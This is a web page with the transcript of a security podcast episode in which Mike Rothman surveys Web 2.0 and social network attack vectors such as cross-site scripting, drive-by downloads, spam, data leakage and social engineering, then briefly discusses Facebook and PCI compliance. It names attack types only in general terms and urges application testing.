We use cookies and other similar technologies (Cookies) to enhance your experience and to provide you with relevant content and ads. By using our website, you are agreeing to the use of Cookies. You can change your settings at any time. Cookie Policy.

The Mike Rothman Security Report


Understanding Web 2.0 Attacks

Vote 0 Votes

In this month's Mike Rothman Security Report, Mike flies solo and rants a bit about Web 2.0 attack vectors. Since Web 2.0 is all the rage and you are hearing from folks you haven't spoken to since elementary school, Mike provides a primer on the types of attacks that you are likely to see from social networks. The good news is there really isn't anything new. The bad news is that everything is happening a lot faster in this age of user-generated content.

Mike also gives himself the "free association" treatment, discussing topics like Facebook and the impact of Web 2.0 on PCI.

Listen to or download the 11:39 minute podcast below:

Download file


Hi, welcome back to the Mike Rothman Security Report here on the ebizQ Network. This month I'm actually going to fly solo because our topic to talk about is Web 2.0 Security and really the application issues and application risks that we face as a revolt of these Web 2.0 types of applications and what kind of risks and what kind of threats.

Basically how many different ways can we get compromised and slammed by our social networking types of applications in this penchant that everybody has to share information about themselves so that's what we're going to talk about here this month.

And I think it’s actually a pretty timely type of discussion for a lot of reasons. And one, I mean, I’m sure many of you that listen to the podcasts on ebizQ tend to be corporate types and that means that somewhere in your organization somewhere bubbling up is the need to use applications like MySpace, like Facebook, like maybe LinkedIn to really start to build communities around your business, right.

Maybe you have some bloggers that are internally writing about what it is that you do, talking, getting involved in the conversation trying to figure out from a thought leadership standpoint how you can present whatever it is that you do in the best possible light.

Well, any time you use that code word called “user generated content?, that means you have some type of security risk. And why? It's because a lot of these applications that are being built and that are being put in place by nowadays allow users to basically add if they’re not websites and certainly content to your site.

And whatever they can basically fill out a form and input information that can be seen by other people that gives them the opportunity to basically compromise your site if you're not careful. So what we're going to do this month is talk a little bit about the risk, talk a little bit about the threat vectors that we have to deal with, or the attack vectors that we have to deal with.

And then next month, I'll have another guest to be determined, it’s a surprise, to really talk about a lot of the defensive aspects of Web 2.0 that we are starting to see emerge. So when we think about the risks, what I can say is that they’re not a lot different than what it is that we’re dealing with when you're talking about general application types of security, or even more generic information security.

We’ve got malware as a risk, malicious code that folks are implementing either by adding images that are compromised, adding scripts into your comment fields that anybody that renders the web page then gets compromise because script obviously runs code in somebody else's browser. We got drive-by downloads.

Again, these are types of data that would be input into your website that then, again, downloads some type of malicious code to the visitor whenever they show up. Again, we’ve seen a lot of different applications that have been vulnerable to this kind of thing whether it's any of the blogging networks or something like MySpace or even Facebook.

We have spam. Obviously, the spammers are out in force and they're doing a couple of things. The spammers are really 1) about getting their message out whatever it is that they're pushing but 2) they’re also again trying to implement and integrated malicious code into your site. So if you get a friend requests from somebody that you don't know who they are, in many cases there could be something compromised or something malicious about the intent of that type of friend requests so we have to be careful about that.

We got data leakage. Obviously, folks are sharing more and more of their reality, more and more of whatever it is that they do out on these networks. And of course, if we just look back to Governor Palin here in the United States, the vice presidential candidate, she had her Yahoo mail compromised because of basically some information that she shared out there.

And obviously, she’s a public figure and people did all sorts of digging to figure out what she was about but that information was used to compromise her specific information out on the network, used that to get into her e-mail and then create all sorts of havoc.

The whole data leakage thing is really related to targeted attacks. This is another thing that we're starting to see a lot more of, especially, when you think about the individuality of something like Facebook, something like MySpace because what that does is it allows somebody to target, for instance, a high net worth individual.

Maybe you get a friend request from somebody that you knew. Well, how do you know them? Well, because maybe you published somewhere that you went out with Bob and you had a great time at the ball game or something like that. Well, amazingly enough maybe Bob sends you a friend request. But it's not Bob its actually Andres who happens to be in Estonia who is trying to use that information to friend you to be able to compromise your specific environment, or send you an e-mail that says hey, I know all about your mortgage that is having problems because you are a customer of Wachovia, for example.

Maybe you're a little concerned because of the Citigroup acquisition. Again, there are a lots of different ways to find information about you that can be used within the targeted attack that is again somewhat unique to Web 2.0 just because you are sharing a lot more information out there. We got traditional application attacks or another way Web 2.0 applications can be compromised.

And these are the cross-site scripting attacks, the cross-site request forgery attacks outspoken about at length on previous editions of the Mike Rothman Security Report so you may want to go back, search the archives at the ebizQ Network and check out those posts and those podcast.

Because, again, I do some introductory types of information about those specific attacks but those are very much in play when you talk about Web 2.0 because again they’re typically application attacks from that perspective so we're not able to get out from underneath a lot of those very specific types of application attacks.

And finally, there's the whole thing of social engineering, right. Again, its still back to praying on the gullibility of many of the users out there. You send them a mess saying hey, click on this thing its really funny, or click on this thing Bin Ladin’s been captured, or click on this thing the bailout in the United States didn't go through. And low and behold, you go to a web site that then renders some code because it's been uploaded to this Web 2.0 site and you’re compromised from that standpoint.

So all these things are still in play, still in very much a problem from the standpoint of Web 2.0. So again, what’s the impact here, right? We all know the world's a problem. We all know that, basically, we’re kind of screwed from the standpoint of what it is that we're doing relative to protecting ourselves fro Web 2.0. Again, next month we’re going to talk a little bit about these specific defenses, but in general, we have to be aware.

In general, we have to be testing our applications to make sure that we are using and understanding what specific vulnerabilities, what specific exploit paths are actually available to the specific applications. Because again, if you don't even know what's vulnerable, if you don't know how you can be compromised, how are you going to fix it.

So again, I'm a big fan of testing our application. I'm a big fan of penetration testing. I'm a big fan of application scanners because again, I believe it’s very important to know what is vulnerable from the standpoint of your specific application. Again, I don't think a lot of these problems are going to go away anytime soon because there's still a huge; a huge economic incentive for the bad guys to continue to do what it is that they're doing.

So again, I think the problem is going to get worse before it gets better. I wanted to this month really talk a little bit about these specific attack vectors that we’re dealing with as opposed to next month when we start talking about solutions so I'll put you on hold a little bit from that standpoint. Sorry about that but again in a 10-minute podcast I can't really go through both in one specific session.

We’ll have a great guest next month so that's kind of main session. But what also want to do is maybe do a little bit of free association on myself because this is really one of those things where God I put everybody else through free association maybe I should do it myself.

So okay, I'll try to be schizophrenic a little bit here and out of one side of my brain blurt out a topic something like Facebook and then out of the side of my brain I'll have to respond in basically a paragraph or two. And in general, Facebook is one of these things that you kind of have to be involved in because a lot of your customers, a lot of your users, a lot of your employees are involved in this.

And again, its one of these places that's kind the a festering pit of malware right now. It doesn't really that high profile an issue because nothing truly malicious has really happened on Facebook but I think that's a matter of time. So I am cautiously skeptical that we’ll be able continue to escape some massive Facebook type of either privacy or data leakage type of thing so watch this space from that standpoint.

And the other thing, my next free association topic, let’s say PCI, right. So a lot of folks are vulnerable or a have to be compliant with PCI regulations. If you collect credit cards, how does Web 2.0 impact PCI? Well basically, again, a lot of it just gets back to the same ideas that I was not about earlier on in the podcast. Web 2.0 its interesting but it’s not necessarily that different from what it is that we've done before.

Part of PCI is to do web application testing, it’s to do maybe build your applications using a secure development life cycle, maybe is to build your specific environment and use a web application firewall to protect those applications. So those are things that can apply to Web 2.0 applications just as they can any other web application. So to me PCI, again, it’s just more the same from that standpoint.

So with that, I want to thank you for your time and your attention. I want to once again thank you my host for the Mike Rothman Security Report, myself. And also, thank the ebizQ Network who are so kind and gracious to give me a forum to basically babble about all the things that I think are important. So we'll see you next month when we talk a little bit more about Web 2.0 defenses. And until then this is Mike Rothman. Be well.

ebizQ is proud to bring you Security Incite's Mike Rothman, who podcasts and writes on application security and related topics.

Recently Commented On

Monthly Archives